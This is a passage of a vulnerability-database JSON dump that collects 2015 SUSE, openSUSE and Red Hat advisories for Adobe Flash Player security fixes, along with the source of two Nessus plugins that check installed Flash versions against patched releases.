href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357</a>>\n * CVE-2015-0358\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358</a>>\n * CVE-2015-0359\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359</a>>\n * CVE-2015-0360\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360</a>>\n * CVE-2015-3038\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038</a>>\n * CVE-2015-3039\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039</a>>\n * CVE-2015-3040\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040</a>>\n * CVE-2015-3041\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041</a>>\n * CVE-2015-3042\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042</a>>\n * CVE-2015-3043\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043</a>>\n * CVE-2015-3044\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044</a>>\n\n", "edition": 1, "modified": "2015-04-16T00:04:48", "published": "2015-04-16T00:04:48", "href": 
"http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00012.html", "id": "SUSE-SU-2015:0723-1", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:45:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2014-0581", "CVE-2014-0574", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2014-0576", "CVE-2015-0353", "CVE-2015-3041", "CVE-2014-0590", "CVE-2015-0350", "CVE-2014-8442", "CVE-2015-3040", "CVE-2014-0583", "CVE-2015-0349", "CVE-2014-0577", "CVE-2015-0352", "CVE-2014-0569", "CVE-2014-0589", "CVE-2014-0584", "CVE-2015-3044", "CVE-2015-0331", "CVE-2014-0558", "CVE-2014-0586", "CVE-2015-0347", "CVE-2015-0354", "CVE-2014-0573", "CVE-2014-0585", "CVE-2015-3039", "CVE-2014-8437", "CVE-2015-0360", "CVE-2014-0582", "CVE-2015-3038", "CVE-2015-0359", "CVE-2014-0588", "CVE-2015-0356", "CVE-2015-3043", "CVE-2014-8440", "CVE-2015-3042", "CVE-2014-8438", "CVE-2015-0332", "CVE-2014-0564", "CVE-2014-8441"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n 
(CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044)\n\n", "edition": 1, "modified": "2015-04-16T13:04:48", "published": "2015-04-16T13:04:48", "id": "OPENSUSE-SU-2015:0725-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00013.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:46:24", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-16T00:05:04", "published": "2015-05-16T00:05:04", "id": "OPENSUSE-SU-2015:0890-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00010.html", "title": "Security update for flash-player (important)", "type": "suse", 
"cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:09:51", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-14T20:04:55", "published": "2015-05-14T20:04:55", "id": "SUSE-SU-2015:0878-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00007.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:13:40", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3079", "CVE-2015-3083", "CVE-2015-3092", "CVE-2015-3090", "CVE-2015-3077", "CVE-2015-3084", "CVE-2015-3080", "CVE-2015-3082", "CVE-2015-3086", "CVE-2015-3044", "CVE-2015-3081", "CVE-2015-3088", "CVE-2015-3085", "CVE-2015-3078", "CVE-2015-3089", "CVE-2015-3087", "CVE-2015-3093", "CVE-2015-3091"], "description": "The Adobe flash-player 
package was updated to version 11.2.202.460 to fix\n several security issues.\n\n The following vulnerabilities were fixed (bsc#930677):\n * APSB15-09, CVE-2015-3044, CVE-2015-3077, CVE-2015-3078, CVE-2015-3079,\n CVE-2015-3080, CVE-2015-3081, CVE-2015-3082, CVE-2015-3083,\n CVE-2015-3084, CVE-2015-3085, CVE-2015-3086, CVE-2015-3087,\n CVE-2015-3088, CVE-2015-3089, CVE-2015-3090, CVE-2015-3091,\n CVE-2015-3092, CVE-2015-3093\n\n More information can be found at the Adobe Security Bulletin APSB15-09:\n <a rel=\"nofollow\" href=\"https://helpx.adobe.com/security/products/flash-player/apsb15-09.html\">https://helpx.adobe.com/security/products/flash-player/apsb15-09.html</a>\n\n", "edition": 1, "modified": "2015-05-19T17:04:53", "published": "2015-05-19T17:04:53", "id": "OPENSUSE-SU-2015:0914-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-05/msg00016.html", "title": "Security update for flash-player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0346", "CVE-2015-0347", "CVE-2015-0348", "CVE-2015-0349", "CVE-2015-0350", "CVE-2015-0351", "CVE-2015-0352", "CVE-2015-0353", "CVE-2015-0354", "CVE-2015-0355", "CVE-2015-0356", "CVE-2015-0357", "CVE-2015-0358", "CVE-2015-0359", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-3039", "CVE-2015-3040", "CVE-2015-3041", "CVE-2015-3042", "CVE-2015-3043", "CVE-2015-3044"], "description": "The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash\nPlayer web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player. These\nvulnerabilities are detailed in the Adobe Security Bulletin APSB15-06\nlisted in the References section.\n\nMultiple flaws were found in the way flash-plugin displayed certain SWF\ncontent. 
An attacker could use these flaws to create a specially crafted\nSWF file that would cause flash-plugin to crash or, potentially, execute\narbitrary code when the victim loaded a page containing the malicious SWF\ncontent. (CVE-2015-0346, CVE-2015-0347, CVE-2015-0348, CVE-2015-0349,\nCVE-2015-0350, CVE-2015-0351, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354,\nCVE-2015-0355, CVE-2015-0356, CVE-2015-0358, CVE-2015-0359, CVE-2015-0360,\nCVE-2015-3038, CVE-2015-3039, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043)\n\nA security bypass flaw was found in flash-plugin that could lead to the\ndisclosure of sensitive information. (CVE-2015-3044)\n\nTwo memory information leak flaws were found in flash-plugin that could\nallow an attacker to potentially bypass ASLR (Address Space Layout\nRandomization) protection, and make it easier to exploit other flaws.\n(CVE-2015-0357, CVE-2015-3040)\n\nAll users of Adobe Flash Player should install this updated package, which\nupgrades Flash Player to version 11.2.202.457.\n", "modified": "2018-06-07T09:04:30", "published": "2015-04-15T04:00:00", "id": "RHSA-2015:0813", "href": "https://access.redhat.com/errata/RHSA-2015:0813", "type": "redhat", "title": "(RHSA-2015:0813) Critical: flash-plugin security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-01T05:43:10", "description": "The remote Windows host is missing KB3049508. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. 
A remote attacker can\n exploit these flaws, via specially crafted Flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - An unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allow an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. 
(CVE-2015-3044)", "edition": 28, "published": "2015-04-16T00:00:00", "title": "MS KB3049508: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB3049508.NASL", "href": "https://www.tenable.com/plugins/nessus/82823", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82823);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n script_xref(name:\"MSKB\", value:\"3049508\");\n\n script_name(english:\"MS KB3049508: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks the version of the ActiveX control.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The remote Windows host is missing KB3049508. It is, therefore,\naffected by the following vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. 
(CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityAdvisories/2016/2755801\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/3049508/microsoft-security-advisory-update-for-vulnerabilities-in-adobe-flash\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Microsoft KB3049508.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_activex_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (activex_init() != ACX_OK) audit(AUDIT_FN_FAIL, \"activex_init()\");\n\n# Adobe Flash Player CLSID\nclsid = '{D27CDB6E-AE6D-11cf-96B8-444553540000}';\n\nfile = activex_get_filename(clsid:clsid);\nif (isnull(file))\n{\n activex_end();\n audit(AUDIT_FN_FAIL, \"activex_get_filename\", \"NULL\");\n}\nif (!file)\n{\n activex_end();\n audit(AUDIT_ACTIVEX_NOT_FOUND, clsid);\n}\n\n# Get its version.\nversion = activex_get_fileversion(clsid:clsid);\nif (!version)\n{\n activex_end();\n audit(AUDIT_VER_FAIL, file);\n}\n\ninfo = '';\n\niver = split(version, sep:'.', keep:FALSE);\nfor (i=0; i<max_index(iver); i++)\n iver[i] = int(iver[i]);\n\n# < 17.0.0.169\nif (\n (report_paranoia > 1 || activex_get_killbit(clsid:clsid) == 0) &&\n (\n iver[0] < 17 ||\n (\n iver[0] == 17 &&\n (\n (iver[1] == 0 && iver[2] == 0 && iver[3] < 169)\n )\n )\n )\n)\n{\n info = '\\n Path : ' + file +\n '\\n Installed version : ' + version +\n '\\n Fixed version : 17.0.0.169' +\n '\\n';\n}\n\nport = kb_smb_transport();\n\nif (info != '')\n{\n if (report_verbosity > 0)\n {\n if (report_paranoia > 1)\n {\n report = info +\n '\\n' +\n 'Note, though, that Nessus did not check whether the kill bit was\\n' +\n \"set for the control's CLSID because of the Report Paranoia setting\" + '\\n' +\n 'in effect when this scan was run.\\n';\n }\n else\n {\n report = 
info +\n '\\n' +\n 'Moreover, its kill bit is not set so it is accessible via Internet\\n' +\n 'Explorer.\\n';\n }\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_HOST_NOT, 'affected');\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:34:22", "description": "The version of Adobe Flash Player installed on the remote Windows host\nis equal or prior to version 17.0.0.134. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. 
(CVE-2015-3044)", "edition": 25, "published": "2015-04-14T00:00:00", "title": "Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB15-06.NASL", "href": "https://www.tenable.com/plugins/nessus/82781", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82781);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe Flash Player <= 17.0.0.134 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version of Flash Player.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host\nis equal or 
prior to version 17.0.0.134. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. 
(CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 17.0.0.169 or later.\n\nAlternatively, Adobe has made version 13.0.0.281 and 11.2.202.457\navailable for those installations that cannot be upgraded to 17.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n \n if(isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if(isnull(ver))\n continue;\n\n vuln = FALSE;\n\n # Chrome Flash <= 17.0.0.134\n if(variant == \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"17.0.0.134\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # <= 13.0.0.277\n if(variant != \"Chrome_Pepper\" &&\n ver_compare(ver:ver,fix:\"13.0.0.277\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n # 14-17 <= 17.0.0.134\n if(variant != \"Chrome_Pepper\" &&\n ver =~ \"^1[4567]\\.\" &&\n ver_compare(ver:ver,fix:\"17.0.0.134\",strict:FALSE) <= 0\n ) vuln = TRUE;\n\n if(vuln)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = 